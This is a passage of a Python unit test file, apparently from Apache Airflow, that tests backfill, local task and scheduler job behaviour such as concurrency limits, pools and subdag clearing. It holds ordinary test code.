executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
with timeout(seconds=30):
job.run()
ti0 = TI(
task=subdag.get_task('section-1-task-1'),
execution_date=DEFAULT_DATE)
ti0.refresh_from_db()
self.assertEqual(ti0.state, State.SUCCESS)
sdag = subdag.sub_dag(
task_regex='section-1-task-1',
include_downstream=True,
include_upstream=False)
sdag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
include_parentdag=True)
ti0.refresh_from_db()
self.assertEqual(State.NONE, ti0.state)
ti1 = TI(
task=dag.get_task('some-other-task'),
execution_date=DEFAULT_DATE)
self.assertEqual(State.NONE, ti1.state)
# Checks that all the Downstream tasks for Parent DAG
# have been cleared
for task in subdag_op_task.downstream_list:
ti = TI(
task=dag.get_task(task.task_id),
execution_date=DEFAULT_DATE
)
self.assertEqual(State.NONE, ti.state)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for reschedule
ti.set_state(State.UP_FOR_RESCHEDULE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
ti_status.to_run.clear()
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
)
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True
)
job.run()
session = settings.Session()
tis = session.query(TI).filter(
TI.dag_id == 'test_start_date_scheduling' and TI.task_id == 'dummy'
).order_by(TI.execution_date).all()
queued_times = [ti.queued_dttm for ti in tis]
self.assertTrue(queued_times == sorted(queued_times, reverse=True))
self.assertTrue(all([ti.state == State.SUCCESS for ti in tis]))
dag.clear()
session.close()
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
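# Poll for up to ~5 seconds (50 * 0.1s) while the child process moves the
# TI into the RUNNING state.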
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
clear_db_runs()
clear_db_pools()
clear_db_dags()
clear_db_sla_miss()
clear_db_errors()
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag()
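# Force load_examples to False for every scheduler started in these tests,
# while delegating all other config lookups to the real configuration.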
def getboolean(section, key):
if section.lower() == 'core' and key.lower() == 'load_examples':
return False
else:
return configuration.conf.getboolean(section, key)
cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
mock_getboolean = cls.patcher.start()
mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type dags_folder: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
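# The scheduler methods under test operate on SimpleDag/SimpleDagBag
# snapshots rather than full DAG objects; this helper wraps in-memory DAGs
# accordingly.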
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
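# A backfill-prefixed run_id makes dr1.is_backfill True, so its task
# instance should not be picked up by the scheduler.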
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
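# Pool 'a' has a single slot, so only one of its two scheduled TIs is
# executable; pool 'b' has 100 slots, so both of its TIs qualify.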
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
